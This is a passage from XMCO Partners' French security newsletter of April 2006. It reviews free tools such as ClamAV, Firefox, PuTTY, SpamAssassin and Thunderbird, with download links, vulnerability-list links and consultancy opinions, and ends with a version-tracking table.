ClamAV 0.88 pour LINUX: http://www.clamav.net/stable.php#pagestart ClamWin 0.88 pour Windows: http://www.clamwin.com/content/view/18/46/

Scurit de loutil

Plusieurs failles ont t rapportes mais sont rapidement corriges grce la participation de la communaut du libre: http://secunia.com/product/2538/
ClamAv est un outil libre qui s'avre particulirement efcace lorsqu'il est coupl avec des logiciels comme Amavis et Dansguardian qui proposent des fonctionnalits adaptes ClamAV. Ainsi cet antivirus peut devenir efcace sur des relais de messagerie et rivaliser avec les principaux concurrents du march. Enn la communaut de dveloppeurs est trs ractive.

Avis XMCO

XMCO PARTNERS - CABINET DE CONSEIL EN SCURIT DES SYSTMES DINFORMATION

www.xmcopartners.com

14

LA SCURIT INFORMATIQUE AVRIL 2006

Firefox
Navigateur Internet
Version actuelle Utilit Type Description

version 1.5, une version beta 2.0 est galement disponible

Navigateur Internet Longtemps relay au second plan derrire Internet Explorer, Firefox commence devenir un navigateur Internet apprci de tous. Disponible sur les trois plateformes Windows, Linux et Mac OS, le protg de la fondation Mozilla na rien envier son concurrent. Lger, pratique, personnalisable, cet outil se diffrencie par ses onglets permettant de naviguer sur plusieurs sites partir dune seule fentre et une fonctionnalit de recherche est intgre. Linterface est intuitive et laspect scurit na pas t nglig. En effet, Firefox bloque les pop-up, les virus, les publicits et les logiciels malveillants. Enn, les favoris dInternet Explorer peuvent tre imports et lensemble du logiciel est facilement congurable.

Capture dcran

Tlchargement Scurit de loutil

http://www.mozilla-europe.org/fr/products/refox/
Comme tout logiciel utilis chaque jour par des millions de personnes, Firefox souffre de nombreuses vulnrabilits dcouvertes chaque mois. Le navigateur Internet tant le principal vecteur dexploitation dattaques diverses, les attaquants se focalisent plus particulirement sur ces utilitaires. La liste des failles identies est disponible ladresse ci-dessous: http://secunia.com/product/4227/
Firefox est un navigateur web qui doit tre diffus largement en entreprise. En effet, ce logiciel n'a rien envier Internet Explorer et est moins touch par la publication de vulnrabilits. Ce client web est donc une alternative simple et efcace.

Avis XMCO

XMCO PARTNERS - CABINET DE CONSEIL EN SCURIT DES SYSTMES DINFORMATION

www.xmcopartners.com

15

LA SCURIT INFORMATIQUE AVRIL 2006

Putty
Client SSH
Version actuelle Type Utilit Description

Putty 0.58 Outil SSH, Telnet et Rlogin pour Windows

Putty est un utilitaire indispensable pour les connexions SSH sous Windows. Cest un des seuls outils pour le systme dexploitation de Microsoft permettant de se connecter distance des serveurs en utilisant les protocoles SSH. LIP des diffrents serveurs peut tre enregistre et toutes les options sont congurables (couleurs, polices de caractres,). Il est galement possible de choisir entre SSH1 et SSH2, dutiliser le mode passif pour les ngociations Telnet ... Cet outil est disponible pour tous les systmes Windows95, 98, ME, NT, 2000 et XP.

Capture dcran

Tlchargement Scurit de loutil

http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html Peu de failles ont t rapportes et ont causs des dnis de service La liste des vulnrabilits est disponible ladresse ci-dessous: http://secunia.com/product/4506/
Putty est un client SSH efcace. De plus, la fonctionnalit de tunnel permet de crer des VPN partir d'un serveur SSH. Cet outil lger et libre est donc un outil simple adopter.

Avis XMCO

XMCO PARTNERS - CABINET DE CONSEIL EN SCURIT DES SYSTMES DINFORMATION

www.xmcopartners.com

16

LA SCURIT INFORMATIQUE AVRIL 2006

Spamassasin
Dispositif de ltre de spams
Version actuelle Utilit Type Description

SpamAssassin 3.1.1

Filtre demails malveillants Spamassassin est un outil de gestion demails malveillants capable de ltrer les courriels indsirables. Il utilise divers mcanismes bass sur: les enttes, lanalyse du texte, une intelligence articielle qui analyse le contenu de lemail (ltre Bayes) et le blocage des DNS. Ce logiciel doit tre install sur les serveurs et traitera les emails avant quils soient reus par les clients de messagerie.

Capture dcran

Tlchargement

Disponible pour les systmes Unix et Mac OS: http://spamassassin.apache.org/downloads.cgi?update=200603111700 Peu de failles ont t rapportes et ont principalement causs des dnis de service. La liste des vulnrabilits est disponible ladresse ci-dessous: http://secunia.com/product/4506/
Spamassassin est un outil tout aussi performant que la plupart des logiciels commerciaux. De plus, la conguration et l'implmentation sont simples et rapides.

Scurit de loutil

Avis XMCO

XMCO PARTNERS - CABINET DE CONSEIL EN SCURIT DES SYSTMES DINFORMATION

www.xmcopartners.com

17

LA SCURIT INFORMATIQUE AVRIL 2006

Thunderbird
Gestionnaire de mails et ux RSS
Version actuelle Utilit Type Description

Thunderbird 1.5

Messagerie et gestionnaire de ux RSS Le dernier n de la fondation Mozilla se nomme Thunderbird. Ce client mail complet est devenu une vritable rfrence. Supportant les protocoles IMAP et POP, ainsi que le formatage des messages HTML, ce logiciel est dot dune interface simple. Ce gestionnaire de mails permet de grer son courrier lectronique facilement: plusieurs comptes peuvent tre grs en parallle et ls RSS peuvent y tre intgrs. Du point de vue scurit, un ltre des courriers indsirables a t implment, le chiffrement des messages et les certicats numriques peuvent galement tre grs. Cet outil est disponible pour les trois plateformes Windows, Linux et MacOS X.

Capture dcran

Tlchargement Scurit de loutil

http://www.mozilla-europe.org/fr/products/thunderbird/
Quelques failles ont t reportes mais sont rapidement corriges par les dveloppeurs. La liste des vulnrabilits de Thunderbird est disponible ladresse ci-dessous:

http://secunia.com/product/4652/
Avis XMCO

Thunderbird est un mailer complet qui est indispensable pour un client nal. Il apporte la simplicit et les fonctions des clients mails les plus avancs mais n'est pas un groupware comme Exchange ou Lotus Notes.

XMCO PARTNERS - CABINET DE CONSEIL EN SCURIT DES SYSTMES DINFORMATION

www.xmcopartners.com

18

LA SCURIT INFORMATIQUE AVRIL 2006

Suivi des versions

Version actuelle des outils libres prsents dans les numros prcdents.
Nom
Debian Sarge Snort MySQL

Dernire version
Version stable 3.1 2.4.4 5.0.19 5.1.7-Bta

Date
08/03/2006

Lien
http://www.debian.org/CD/netinst/ http://www.snort.org/dl/ http://dev.mysql.com/downloads/mysql/5.0.html http://dev.mysql.com/downloads/mysql/5.1.html

Apache

2.2.0 1.3.34

05/12/2005 16/10/2005 11/02/2005

http://www.apachefrance.com/Telechargement/4/ http://www.apachefrance.com/Telechargement/4/ http://www.insecure.org/nmap/download.html

Nmap

4.01

XMCO PARTNERS - CABINET DE CONSEIL EN SCURIT DES SYSTMES DINFORMATION

www.xmcopartners.com

19

LA SCURIT INFORMATIQUE AVRIL 2006

XMCO PARTNERS - CABINET DE CONSEIL EN SCURIT DES SYSTMES DINFORMATION

www.xmcopartners.com

20